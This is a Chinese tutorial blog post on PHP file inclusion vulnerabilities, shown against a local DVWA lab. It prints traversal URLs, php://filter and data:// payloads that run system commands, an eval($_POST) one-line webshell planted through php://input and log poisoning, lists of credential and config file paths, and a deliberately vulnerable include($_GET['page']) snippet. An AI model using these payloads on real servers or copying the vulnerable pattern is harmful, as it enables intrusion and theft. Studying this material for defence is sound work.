2. 程式人生 > >文件包含漏洞總結

文件包含漏洞總結

阿新 發佈:2018-06-30
shell. github 引用 常見 logs zip 協議 ria etc

技術分享圖片

前言:

本人(九世)正式從博客園:遷移到:http://hackhat.net。會進行同步更新

正文:

漏洞來源:

文件包含漏洞,得從文件包含說起。一般寫代碼的人都知道,完成一個項目裏面有很多的文件調用和引用

而文件包含漏洞,因為文件包含的時候沒有做對應的防禦措施導致引用的文件變成攻擊者所指定的文件。

PHP中提供了四個文件包含的函數

函數名稱特點
include 遇到錯誤,仍會執行
include_once 遇到錯誤,仍會執行
require 遇到錯誤,不會執行
require_once 遇到錯誤,不會執行

文件包含漏洞又分為:

本地文件包含

遠程文件包含

文件包含利用工具:https://github.com/D35m0nd142/LFISuite

技術分享圖片

本地文件包含:

  • 利用的價值:可包含目標服務器裏面的文件
  • 利用的方法:絕對路徑包含,協議包含,日誌包含
  • 上傳圖片馬,然後包含
  • 若有phpinfo,能知道臨時文件的路徑,則可以包含臨時文件
  • phar協議的特殊姿勢:http://bbs.pediy.com/thread-216191.htm

1.絕對路徑包含

原:

技術分享圖片

將include.php變為/../../../../../phpinfo.php

http://127.0.0.1/DVWA-master/vulnerabilities/fi/?page=include.php
 
http://127.0.0.1/DVWA-master/vulnerabilities/fi/?page=/../../../../../phpinfo.php

技術分享圖片

包含C盤某txt

http://127.0.0.1/DVWA-master/vulnerabilities/fi/?page=/../../../../../windows-version.txt

技術分享圖片 技術分享圖片

可以發現出現在左上角了

2.協議包含

一般使用的協議有 php,file,data,zip

php協議的用法:base64編碼查看腳本的代碼,php進行寫入

例子:

http://127.0.0.1/DVWA-master/vulnerabilities/fi/?page=php://filter/read=convert.base64-encode/resource=/../../../../../shell.php

得到加密的base64:PD9waHAgQGV2YWwoJF9QT1NUWydoYXEnXSk7Pz4=

技術分享圖片

解密之後:

技術分享圖片

file協議的用法:包含文件

例子:和上面的/../../../../../一樣這裏就不在重復

技術分享圖片

data協議的用法:data:text/plain,《php代碼》

例子:

http://127.0.0.1/DVWA-master/vulnerabilities/fi/?page=data:text/plain,%3C?php%20system(%27ipconfig%27);?%3E

很明顯的可以看見,利用data協議執行了cmd命令

技術分享圖片

php://input進行寫入:

php://input&cmd=dir
post提交:<?php @eval($_POST[‘cmd‘]);?>

技術分享圖片

3.日誌包含

利用LFISuite掃描到可以讀取的日誌

直接提交://http://xx.com/<?php @eval($_POST[‘c‘]);?> ,然後burpsuite抓包將提交被html編碼的改好進行提交

訪問日誌,然後配置好C刀即可獲取一個一句話木馬。

技術分享圖片

一些常見的日誌目錄:

windows:

c:\boot.ini
c:\windows\systems32\inetsrv\MetaBase.xml
c:\windows\repair\sam
c:\windows\php.ini             php配置文件
c:\windows\my.ini               mysql配置文件

Linux:

/etc/passwd
/usr/local/app/apache2/conf/http.conf
/usr/local/app/php5/lib/php.ini          PHP相關設置
/etc/httpd/conf/http.conf                    apache配置文件
/etc/my.cnf                                              mysql配置文件

遠程文件包含:

前提:需要開啟allow_url_fopen,默認關閉。
新建php.txt:

1 2 3 <?php echo "hello world"; ?>

新建index.php:

1 2 3 <?php Include($_GET[‘page‘]); ?>

訪問http://www.xxxx.com/page=http://www.xxxx.com/php.txt執行結果將輸出hello world。

python打造文件包含檢測工具:http://www.cnblogs.com/haq5201314/p/9192535.html

測試圖:

技術分享圖片

文件包含漏洞總結

相關推薦

包含漏洞總結

shell. github 引用 常見 logs zip 協議 ria etc 前言: 本人(九世)正式從博客園:遷移到:http://hackhat.net。會進行同步更新 正文: 漏洞來源: 文件包含漏洞,得從文件包含說起。一般寫代碼的人都知道,完成一個項目

【代碼審計】VAuditDemo 包含漏洞

http code 頭像 col 函數 文件名 中一 判斷 包含漏洞 在 index.php中先判斷get過來的module是否設置了變量,如果已經設置,則包含module,並與字符串.inc拼接 inc格式一般是圖標或者頭像格式,因此我們可以初步判斷,這個包含應該是基於

web實戰之包含漏洞小嘗試

web安全本文出自 “大李子” 博客,謝絕轉載!web實戰之文件包含漏洞小嘗試

PHP:包含漏洞

data adf 校驗和 all php版本 req 服務器文件 常用 man 簡單記錄一些文件包含漏洞的常用方法 產生原因: 文件包含漏洞的產生原因是在通過引入文件時,由於傳入的文件名沒有經過合理的校驗,或者校檢被繞過,從而操作了預想之外的文件,就可能導致意外的文件泄露甚

包含漏洞

use att read font 加載 文件的 根目錄 暴露 提交數據 在通過PHP的函數引入文件時,由於傳入的文件名沒有經過合理的校驗,從而操作了預想之外的文件,導致意外的文件泄露甚至惡意的代碼註入。 HP常見的導致文件包含的函數如下:include(),include

包含漏洞進階篇

com http base64編碼 style 本地文件 遠程 存在 size 宋體 前言: 文件包含漏洞雖然在前面已經說過,但是感覺還不到火候。這次在度 深入了解。 目錄: 本地文件包含漏洞的進階 遠程文件包含漏洞 正文: 進入之後選擇文件包含漏洞,如下圖

python打造包含漏洞檢測工具

毒藥 warning UNC plain con int www base64 ble 0x00前言: 做Hack the box的題。感覺那個平臺得開個VIp 不然得涼。一天只能重置一次。。。mmp 做的那題毒藥是文件包含漏洞的題,涉及到了某個工具 看的不錯就開發

php包含漏洞(利用phpinfo)復現

.com shell 發送數據包 上下文 ade lob 刪除 緩沖 com 利用docker復現該漏洞,訪問http://192.168.80.156:8080/phpinfo.php,可以看到頁面出現phpinfo頁面 再訪問http://192.168.80.

常見的解析漏洞總結

不可 can files 影響 漏洞 8.0 名稱 keditor 情況 常見的文件解析漏洞總結 iis解析漏洞 解析漏洞主要是說一些特殊文件被iis,apache,nginx等web容器在特殊情況下被解釋成腳本文件格式 ==iis5.x/6.0解析漏洞:== 1,目錄解析

包含-筆記

本地文件 dsv 區別 eww output php ads -a 系統 以PHP為例 就可以使用 include require 來進行文件包含操作。目的是引用其他的文件、代碼。 當文件包含函數的參數用戶可控是可以引用惡意代碼。 DVWA_1.9此漏洞模塊

Java中獲取資源的方法總結

tco doget 技術 resource images 磁盤 response linux exception 這裏總結3中方法獲取資源文件的 ServletContext Class ClassLoader 文件的位置 1. ServletC

POI以SAX方式解析Excel2007大(包含空單元格的處理) Java生成CSV實例詳解

arraylist api csdn false gif pac apache all top http://blog.csdn.net/l081307114/article/details/46009015 http://www.cnblogs.com/dreammyl

shell--11、Shell 包含

shell 文件包含 和其他語言一樣,Shell 也可以包含外部腳本。這樣可以很方便的封裝一些公用的代碼作為一個獨立的文件。Shell 文件包含的語法格式如下:. filename # 註意點號(.)和文件名中間有一空格 或 source filename實例創建兩個 shell 腳本文件。tes

解析漏洞匯總

host tro apach handle nat 文件合並 常用 com href 解析漏洞正如其名,一般大家常說的是,文件在某種格式下,會被執行為該腳本語言的文件。 文件上傳漏洞通常與Web容器的解析漏洞配合利用 常見Web容器有IIS、Nginx、Apache、To

monxin cms 任意刪除漏洞

str date 發現 漏洞 conf cti 問題 var_dump ray \program\diypage\receive\edit.php首先看到一個unlink($path);本來應該先看sql語句的,但知道是任意文件刪除先跳過刪除語句,看看$path怎麽傳入的倒

Shell包含

sci chm bash 可執行 logs bin 執行權限 science light 創建兩個 shell 腳本文件。 test1.sh 代碼如下: #!/bin/bash url="http://www.cnblogs.com/freescience"

淺談本地包含利用

文件包含 lfishell nc反向連接 今天在公眾號看到了一個本地文件包含的利用工具,看了下國外大牛對該工具的使用的一個視頻,感覺很厲害,通過該工具可對存在本地文件包含漏洞的站點進行利用並返回一個LFI shell,通過返回的LFI shell再次獲取一個反向連接,從而可執行相關命令,以前對本地

WDK開發中的頭包含關系

ddk blog 組織 logs 技術分享 image es2017 msdn 層次 轉載自: http://www.cnblogs.com/bugchecker/archive/2012/10/26/3041591.html http://msdn.microsoft.c

查看靜態庫.a包含的內容

atom file dir dict dump tab drive tro view 查看靜態庫.a文件包含的內容用下面的命令解壓: [plain] view plain copy print? ar x libgdal.a 然

stm8 stvd工程頭包含方式

mage images 技術 窗口 rec 文件包含 tin log nbsp 方式一:在Include Files上右鍵 add files to folder把.h文件添加到該組下, 添加完編譯成功之後,下面窗口會多出一個預處理包含路徑(若有錯誤沒有編譯成功,則看不